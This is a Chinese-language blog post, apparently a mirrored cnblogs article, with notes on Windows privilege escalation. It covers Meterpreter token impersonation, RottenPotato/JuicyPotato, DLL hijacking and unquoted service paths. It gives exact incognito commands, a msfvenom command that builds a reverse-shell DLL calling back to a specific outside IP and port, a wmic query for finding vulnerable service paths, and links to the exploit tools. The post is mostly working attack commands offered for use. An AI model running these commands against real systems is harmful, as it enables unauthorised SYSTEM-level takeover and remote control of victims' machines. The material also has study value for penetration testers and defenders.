zoukankan      html  css  js  c++  java
  • windows提权篇 msf提权-烂土豆提权-dll劫持提权-不带引号服务路径提权

    提权 令牌窃取:窃取system用户的权限,注入system权限的进程

    #msf自带模块窃取  管理员--->系统权限

    前提:需要管理员权限

     输入三条命令:

    use incognito

    list_tokens -u

    impersonate_token "NT AUTHORITYSYSTEM"

    #烂土豆及升级版(web服务型账户权限--> 系统权限)

    use incognito  //枚举有哪些用户的进程,一般有用户和system用户

    list_tokens -u

    execute -cH -f ./rottenpotato.exe  //上传rottenpotato.exe并执行提权

    impersonate_token “NT AUTHORITY\SYSTEM”

    #DLL劫持提权应用配合MSF-Web权限

    原理:Windows程序启动的时候需要DLL。如果这些DLL 不存在,则可以通过在应用程序要查找的位置放置恶意DLL来提权。通常,Windows应用程序有其预定义好的搜索DLL的路径,它会根据下面的顺序进行搜索:

    1、应用程序加载的目录

    2、C:WindowsSystem32

    3、C:WindowsSystem

    4、C:Windows

    5、当前工作目录Current Working Directory,CWD

    6、在PATH环境变量的目录(先系统后用户)

    过程:信息收集-进程调试-制作dll并上传-替换dll-启动应用后成功

    msfvenom -p windows/meterpreter/reverse_tcp lhost=101.37.169.46 lport=6677 -f dll >/opt/test.dll

    #不带引号服务路径配合MSF-Web,本地权限

    原理:当Windows服务运行时,会发生以下两种情况之一。如果给出了可执行文件,并且引用了完整路径,则系统会按字面解释它并执行。但是,如果服务的二进制路径未包含在引号中,则操作系统将会执行找到的空格分隔的服务路径的第一个实例。

    过程:检测引号服务路径-利用路径制作文件并上传-启用服务或重启-调用后成功

    wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:Windows\" |findstr /i /v """

    cs也有提权的插件

    https://github.com/ohpe/juicy-potato   //2019出的,这个提权工具比较新,好用

    https://github.com/foxglovesec/RottenPotato

    https://github.com/breenmachine/RottenPotatoNG

  • 相关阅读:
    习惯
    mysql
    mysql
    mysql
    MYSQL
    MYSQL
    mysql
    手动从Spring中获取指定对象
    jdbc连接数据库
    java代码调用exe(cmd命令)
  • 原文地址:https://www.cnblogs.com/trevain/p/13698918.html
Copyright © 2011-2022 走看看